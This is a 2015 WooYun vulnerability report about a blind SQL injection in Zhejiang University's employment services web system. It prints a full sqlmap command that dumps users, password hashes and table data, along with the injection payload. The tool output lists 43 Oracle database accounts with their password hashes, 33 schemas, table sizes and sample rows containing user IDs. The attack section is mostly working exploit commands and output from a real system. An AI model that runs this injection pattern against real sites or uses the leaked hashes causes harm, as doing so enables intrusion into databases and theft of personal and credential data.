当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154710

漏洞标题:浙江大学就业指导与服务中心某处存在SQL注射漏洞(DBA权限/43名系统管理员密码泄露/33个库/245万ID信息泄露/92万日志信息泄露)

相关厂商:浙江大学

漏洞作者: 路人甲

提交时间:2015-11-22 10:40

修复时间:2015-11-27 10:42

公开时间:2015-11-27 10:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-22: 细节已通知厂商并且等待厂商处理中
2015-11-27: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

浙江大学就业指导与服务中心某处存在SQL注射漏洞(DBA权限/43名系统管理员密码泄露/33个库/245万ID信息泄露/92万日志信息泄露)

详细说明:

地址:http://**.**.**.**/ejob/loginzphdwzpxx.do?dwloginid=%B0%B2%BB%D5%D6%D0%C5%A9%B8%BB%CD%A8%C5%A9%D2%B5%B9%E6%BB%AE%BF%C6%D1%A7%D1%D0%BE%BF%CB%F9%D3%D0%CF%DE%B9%AB%CB%BE

python sqlmap.py -u "http://**.**.**.**/ejob/loginzphdwzpxx.do?dwloginid=%B0%B2%BB%D5%D6%D0%C5%A9%B8%BB%CD%A8%C5%A9%D2%B5%B9%E6%BB%AE%BF%C6%D1%A7%D1%D0%BE%BF%CB%F9%D3%D0%CF%DE%B9%AB%CB%BE" -p dwloginid --technique=B --random-agent --batch --current-user --is-dba --users --passwords -D EJOB -T WJDC_WJHDB -C DRNF,PLSX,STID,TXNR,WJID,XXID,YHID --dump --start 1 --stop 10


back-end DBMS: Oracle
Database: EJOB
+---------------------------+---------+
| Table                     | Entries |
+---------------------------+---------+
| WJDC_WJHDB                | 2453668 |
| XT_ZDLOG                  | 923276  |


漏洞证明:

---
Parameter: dwloginid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: dwloginid=%B0%B2%BB%D5%D6%D0%C5%A9%B8%BB%CD%A8%C5%A9%D2%B5%B9%E6%BB%AE%BF%C6%D1%A7%D1%D0%BE%BF%CB%F9%D3%D0%CF%DE%B9%AB%CB%BE' AND 7520=7520 AND 'EFsN'='EFsN
---
web application technology: JSP
back-end DBMS: Oracle
current user:    'EJOB'
current user is DBA:    True
database management system users [43]:
[*] ADMISSION
[*] ANONYMOUS
[*] BOOK985211
[*] BWCMIS
[*] CMS
[*] CTXSYS
[*] DBSNMP
[*] DIP
[*] DNT
[*] EJOB
[*] EXFSYS
[*] IRDP
[*] IRDP_SJTB
[*] KLGB
[*] KLGB_USER
[*] MDSYS
[*] MGMT_VIEW
[*] ORACLE_OCM
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] RWSK
[*] RWSKDBA
[*] SEARCH
[*] SHARE1010
[*] SI_INFORMTN_SCHEMA
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
[*] XSTD
[*] ZABBIX
[*] ZD_GJJY
[*] ZDQK
[*] ZDWEB
[*] ZFMH
[*] ZFSMP
[*] ZJUPAS
[*] ZJUSEARCH
[*] ZUSS
[*] ZXGL
database management system users password hashes:
[*] ADMISSION [1]:
    password hash: 9576C4AF4F314090
[*] ANONYMOUS [1]:
    password hash: anonymous
[*] BOOK985211 [1]:
    password hash: 35B32F7CB49869E1
[*] BWCMIS [1]:
    password hash: 3C915384B5DE27C9
[*] CMS [1]:
    password hash: 21888B15738276A5
[*] CTXSYS [1]:
    password hash: 24ABAB8B06281B4C
[*] DBSNMP [1]:
    password hash: E066D214D5421CCC
[*] DIP [1]:
    password hash: CE4A36B8E06CA59C
[*] DNT [1]:
    password hash: B96A665A672DF17E
[*] EJOB [1]:
    password hash: 184B5FD05A261CE4
[*] EXFSYS [1]:
    password hash: 66F4EF5650C20355
[*] IRDP [1]:
    password hash: 7B842C52ACD30787
[*] IRDP_SJTB [1]:
    password hash: 3886DF4B6E7F52D3
[*] KLGB [1]:
    password hash: 3E9571A6D1901919
[*] KLGB_USER [1]:
    password hash: 3FCA1F5D76FD61D2
[*] MDSYS [1]:
    password hash: 72979A94BAD2AF80
[*] MGMT_VIEW [1]:
    password hash: 5449705B65AA80C1
[*] ORACLE_OCM [1]:
    password hash: 5A2E026A9157958C
[*] ORDPLUGINS [1]:
    password hash: 88A2B2C183431F00
[*] ORDSYS [1]:
    password hash: 7EFA02EC7EA6B86F
[*] OUTLN [1]:
    password hash: 4A3BA55E08595C81
[*] RWSK [1]:
    password hash: DD74726A0654D550
[*] RWSKDBA [1]:
    password hash: 4E36415ED0B1F7AD
[*] SEARCH [1]:
    password hash: 5E46E91399F31935
[*] SHARE1010 [1]:
    password hash: C0BC1D5DB5A8A848
[*] SI_INFORMTN_SCHEMA [1]:
    password hash: 84B8CBCA4D477FA3
[*] SYS [1]:
    password hash: 75800913E1B66343
[*] SYSMAN [1]:
    password hash: 447B729161192C24
[*] SYSTEM [1]:
    password hash: F60464F7C3324170
[*] TSMSYS [1]:
    password hash: 3DF26A8B17D0F29F
[*] WMSYS [1]:
    password hash: 7C9BA362F8314299
[*] XDB [1]:
    password hash: 88D8364765FCE6AF
[*] XSTD [1]:
    password hash: FA5A38495BE751EE
[*] ZABBIX [1]:
    password hash: 917FF6AAC3AD8ABB
[*] ZD_GJJY [1]:
    password hash: 62CCCD604CBEEB83
[*] ZDQK [1]:
    password hash: EF4EF71B6469DF34
[*] ZDWEB [1]:
    password hash: 9F41AAD997C24D7E
[*] ZFMH [1]:
    password hash: AC679BFBC9727906
[*] ZFSMP [1]:
    password hash: 4FBCB2BD281A6653
[*] ZJUPAS [1]:
    password hash: 43886DBC3C13ED61
[*] ZJUSEARCH [1]:
    password hash: 84F958A512659E2A
[*] ZUSS [1]:
    password hash: B864134D33CB3A73
[*] ZXGL [1]:
    password hash: E7737492D8EA1F8E
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: dwloginid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: dwloginid=%B0%B2%BB%D5%D6%D0%C5%A9%B8%BB%CD%A8%C5%A9%D2%B5%B9%E6%BB%AE%BF%C6%D1%A7%D1%D0%BE%BF%CB%F9%D3%D0%CF%DE%B9%AB%CB%BE' AND 7520=7520 AND 'EFsN'='EFsN
---
web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: dwloginid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: dwloginid=%B0%B2%BB%D5%D6%D0%C5%A9%B8%BB%CD%A8%C5%A9%D2%B5%B9%E6%BB%AE%BF%C6%D1%A7%D1%D0%BE%BF%CB%F9%D3%D0%CF%DE%B9%AB%CB%BE' AND 7520=7520 AND 'EFsN'='EFsN
---
web application technology: JSP
back-end DBMS: Oracle
available databases [33]:
[*] ADMISSION
[*] BOOK985211
[*] BWCMIS
[*] CMS
[*] CTXSYS
[*] DBSNMP
[*] DNT
[*] EJOB
[*] EXFSYS
[*] IRDP
[*] IRDP_SJTB
[*] KLGB
[*] KLGB_USER
[*] MDSYS
[*] ORDSYS
[*] OUTLN
[*] RWSK
[*] RWSKDBA
[*] SHARE1010
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
[*] ZD_GJJY
[*] ZDQK
[*] ZDWEB
[*] ZFMH
[*] ZFSMP
[*] ZJUPAS
[*] ZUSS
[*] ZXGL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: dwloginid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: dwloginid=%B0%B2%BB%D5%D6%D0%C5%A9%B8%BB%CD%A8%C5%A9%D2%B5%B9%E6%BB%AE%BF%C6%D1%A7%D1%D0%BE%BF%CB%F9%D3%D0%CF%DE%B9%AB%CB%BE' AND 7520=7520 AND 'EFsN'='EFsN
---
web application technology: JSP
back-end DBMS: Oracle
current schema (equivalent to database on Oracle):    'EJOB'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: dwloginid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: dwloginid=%B0%B2%BB%D5%D6%D0%C5%A9%B8%BB%CD%A8%C5%A9%D2%B5%B9%E6%BB%AE%BF%C6%D1%A7%D1%D0%BE%BF%CB%F9%D3%D0%CF%DE%B9%AB%CB%BE' AND 7520=7520 AND 'EFsN'='EFsN
---
web application technology: JSP
back-end DBMS: Oracle
Database: EJOB
+---------------------------+---------+
| Table                     | Entries |
+---------------------------+---------+
| WJDC_WJHDB                | 2453668 |
| XT_ZDLOG                  | 923276  |
| ZD_DA_XSDAQDB             | 316790  |
| WJDC_WJDJRB               | 303219  |
| ZD_SYXXB                  | 93367   |
| ZD_XYXXB                  | 86233   |
| ZD_SYXXB_TMP_TEST1        | 85246   |
| ZD_JYXXB                  | 82053   |
| ZD_BDZHB                  | 71392   |
| ZD_BDZHB_TMP_TEST1        | 59513   |
| ZD_BDXXB                  | 55306   |
| ZD_JYXGJLB                | 52414   |
| ZD_DAXXB                  | 41727   |
| ZD_DAXXB_TMP_TEST1        | 41727   |
| ZD_SYXGJLB                | 34733   |
| ZDWZ_ZPXXB                | 29324   |
| ZDWZ_ZPHCDYDB             | 25073   |
| ZDWZ_DWZPB                | 21816   |
| WJDC_DJR_XSK              | 21403   |
| ZD_DWXXB                  | 21140   |
| ZD_XYSHB                  | 20261   |
| ZD_BMQTXXB                | 16885   |
| BAK_ZDWZ_ZPXXB            | 16747   |
| ZDWZ_ZWTJB                | 16719   |
| ZDWZ_DWZCB                | 16419   |
| ZD_BMXXB                  | 15190   |
| ZXQY_QYXXB                | 13573   |
| WJDC_DJR_XSK_TMP_TEST1    | 12103   |
| TEST_ZD_SYXXB             | 11997   |
| ZD_BDZHB_TMP2_TEST1       | 11879   |
| ZD_BMGRXXB                | 11620   |
| WJDC_DJR_XSK_TMP2_TEST1   | 10621   |
| ZD_TJXXB                  | 9478    |
| DMK_CODELIST              | 9258    |
| ZD_MYXXB                  | 9231    |
| ZD_MYXXB_TMP_TEST1        | 8323    |
| WJDC_XYWJFSB              | 8210    |
| ZD_XY_ZY                  | 8088    |
| XT_USERPURVIEW            | 7844    |
| ZXQY_QYDWB                | 7789    |
| ZDWZ_ZPHSQB               | 6599    |
| YAN_ZD_SYXXB              | 6554    |
| TEMP_ZD_SYXXB             | 6234    |
| BEN_ZD_SYXXB              | 6150    |
| ZD_SYXGSQB                | 4924    |
| WJDC_STK_XXB              | 4336    |
| WJDC_DJR_XYK              | 4109    |
| JC_AREA_TEMP              | 3839    |
| ZDWZ_ZCZPHXXB             | 3700    |
| DMK_CODELIST_TMP2_TEST1   | 3524    |
| JC_AREA                   | 3491    |
| ZDWZ_CDSQB                | 3274    |
| ZD_WYXXB                  | 2995    |
| DMK_XX                    | 2981    |
| WJDC_DJR_XYK_TMP2_TEST1   | 2854    |
| ZDWZ_ZCQTXXB              | 2735    |
| DMK_CODELIST_TMP_TEST1    | 2450    |
| ZD_XYXXSZB                | 2173    |
| TMP_DWXXB                 | 2148    |
| ZD_ZY                     | 2074    |
| ZD_ZY_TEST                | 2002    |
| ZDWZ_CDSQB_BAK            | 1769    |
| YW_STUINFOMODIFY          | 1734    |
| YW_STUDENTINFO            | 1732    |
| JC_ZHUANYE                | 1537    |
| ZD_XYSH_NEW               | 1493    |
| WJDC_WJXXXXB              | 1461    |
| ZDWZ_ZPTMP                | 1445    |
| ZD_TJB                    | 1389    |
| WJDC_DJR_XYK_TMP_TEST1    | 1257    |
| ZD_XYSH_OLD               | 1129    |
| ZDWZ_CDSQSFXMB            | 1095    |
| TEMP_MYXSB                | 1032    |
| TEST_ZD_XY_ZY             | 988     |
| JC_GVLIST                 | 967     |
| ZD_BMZDPZB                | 930     |
| ZD_DAB                    | 881     |
| ZD_DAB_TMP_TEST1          | 875     |
| WJDC_STK                  | 838     |
| ZDWZ_CDSQSFXMB_BAK        | 671     |
| ZD_SJSBB_JSH              | 664     |
| ZD_SY_ZY                  | 662     |
| ZD_SYXXB_TMP2_TEST1       | 474     |
| TEST                      | 469     |
| BAK_SYSXXB                | 393     |
| ZD_DWSSJTB                | 373     |
| ZDWZ_ZWLB_MC              | 373     |
| JC_CITY                   | 348     |
| ZDWZ_ZWMCB                | 336     |
| XT_ROLETOMODEL            | 302     |
| PRINTPAGE                 | 220     |
| XT_ADMINUSER              | 215     |
| ZD_BMXMB                  | 196     |
| ZD_WJGLB                  | 171     |
| ZD_XYSYSB                 | 160     |
| ZDWZ_ZCLXRB               | 160     |
| JC_SCHOOL                 | 137     |
| ZD_BDZGPYSB               | 124     |
| XT_SUBMODEL               | 87      |
| ZD_MYXXB_TMP2_TEST1       | 86      |
| JC_GVLISTTEMP             | 76      |
| XT_SUBMODELTEMP           | 74      |
| NEWSCONTENT               | 69      |
| ZDWZ_ZPHXXB               | 65      |
| ZDWZ_ZPHCDB               | 59      |
| ZDWZ_CDSFXMGXB            | 58      |
| WJDC_WJSTDLB              | 57      |
| DMK_TYPELIST              | 53      |
| TEST_ZD_JYXXB             | 51      |
| ZD_DA_DAQDB               | 51      |
| WJDC_JCDMK                | 49      |
| ZDWZ_HYLBB                | 46      |
| WJDC_WJJBXXB              | 45      |
| ZD_DAXXB_TMP2_TEST1       | 45      |
| ZD_SJSBB                  | 43      |
| ZD_ZY_A                   | 42      |
| ZXQY_DWXZDMB              | 40      |
| ZDWZ_ZWLBB                | 38      |
| YW_CLASS                  | 36      |
| NEWS_TMP                  | 22      |
| XT_MODEL                  | 21      |
| YW_NEWS_COLUMN            | 21      |
| ZD_YHDCZDB                | 21      |
| JC_RESTYPE                | 20      |
| ZDWZ_CDSFXMB              | 20      |
| XT_ROLE                   | 18      |
| YW_STUINFOMODIFY_TEMP     | 18      |
| YW_STUDENTINFO_TEMP       | 14      |
| ZD_YHFKB                  | 14      |
| YW_STUDENTINFO_TMP_SYS    | 13      |
| WJDC_WJLJB                | 12      |
| ZD_ZNXWB                  | 11      |
| WJDC_STLXDMB              | 9       |
| YW_COLLEGE_TEMP           | 8       |
| YW_DATELIST               | 8       |
| YW_SCHOOL_ZHUANYE         | 8       |
| YW_AD                     | 7       |
| YW_CLASS_TEMP             | 6       |
| YW_SCHOOL_ZHUANYE_TEMP    | 6       |
| ZD_DAB_TMP2_TEST1         | 6       |
| ZD_YJMBB                  | 6       |
| ZD_YXYHB                  | 6       |
| WJDC_DZLJB                | 5       |
| ZDWZ_CDYHQXB              | 5       |
| JC_POSTTYPE               | 4       |
| YW_AD_POSITION            | 4       |
| YW_STUDENTINFOTEMP_TMP_XX | 4       |
| YW_STUJYJHBTMP            | 4       |
| YW_WJDCB                  | 4       |
| YW_AD_PAGE                | 3       |
| YW_STUDENTINFOTEMP_TEMP   | 3       |
| JC_SCHOOLTEMP             | 2       |
| JC_ZHUANYE_TEMP           | 2       |
| JL_PRACTICE               | 2       |
| YW_COLLEGE                | 2       |
| YW_STUJYXG                | 2       |
| YW_STUPLANMODIFY          | 2       |
| YW_ZBMS                   | 2       |
| ZD_BDZYSCTJB              | 2       |
| ZD_DCZDB                  | 2       |
| JL_MINORTRAINING          | 1       |
| WJDC_CSSZB                | 1       |
| XT_PARASETTING            | 1       |
| YW_SJSZ                   | 1       |
| YW_STUJYJHB               | 1       |
| YW_STUPLAN                | 1       |
| YW_STUUSERINFO            | 1       |
| ZD_CSSZB                  | 1       |
| ZD_SJSBB_CHECK            | 1       |
| ZD_SYXXB_CHECK            | 1       |
+---------------------------+---------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: dwloginid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: dwloginid=%B0%B2%BB%D5%D6%D0%C5%A9%B8%BB%CD%A8%C5%A9%D2%B5%B9%E6%BB%AE%BF%C6%D1%A7%D1%D0%BE%BF%CB%F9%D3%D0%CF%DE%B9%AB%CB%BE' AND 7520=7520 AND 'EFsN'='EFsN
---
web application technology: JSP
back-end DBMS: Oracle
Database: EJOB
Table: WJDC_WJHDB
[7 columns]
+--------+----------+
| Column | Type     |
+--------+----------+
| DRNF   | VARCHAR2 |
| PLSX   | VARCHAR2 |
| STID   | VARCHAR2 |
| TXNR   | VARCHAR2 |
| WJID   | VARCHAR2 |
| XXID   | VARCHAR2 |
| YHID   | VARCHAR2 |
+--------+----------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: dwloginid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: dwloginid=%B0%B2%BB%D5%D6%D0%C5%A9%B8%BB%CD%A8%C5%A9%D2%B5%B9%E6%BB%AE%BF%C6%D1%A7%D1%D0%BE%BF%CB%F9%D3%D0%CF%DE%B9%AB%CB%BE' AND 7520=7520 AND 'EFsN'='EFsN
---
web application technology: JSP
back-end DBMS: Oracle
Database: EJOB
Table: WJDC_WJHDB
[10 entries]
+------+------+------+------+------+------+------------+
| DRNF | PLSX | STID | TXNR | WJID | XXID | YHID       |
+------+------+------+------+------+------+------------+
| 2011 | 1    | 154  | NULL | 16   | 746  | 3070601193 |
| 2011 | 0    | 152  | NULL | 16   | 729  | 3070601193 |
| 2011 | 1    | 151  | NULL | 16   | 724  | 3070601193 |
| 2011 | 2    | 130  | NULL | 16   | 646  | 3070601193 |
| 2011 | 0    | 125  | NULL | 16   | 625  | 3070601193 |
| 2011 | 0    | 156  | NULL | 16   | 754  | 20808001   |
| 2011 | 0    | 152  | NULL | 16   | 731  | 3070902120 |
| 2011 | 0    | 151  | NULL | 16   | 721  | 3070301015 |
| 2011 | 1    | 152  | NULL | 16   | 735  | 20903051   |
| 2011 | 2    | 130  | NULL | 16   | 646  | 20903031   |
+------+------+------+------+------+------+------------+


修复方案:

增加过滤。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-27 10:42

厂商回复:

最新状态:

暂无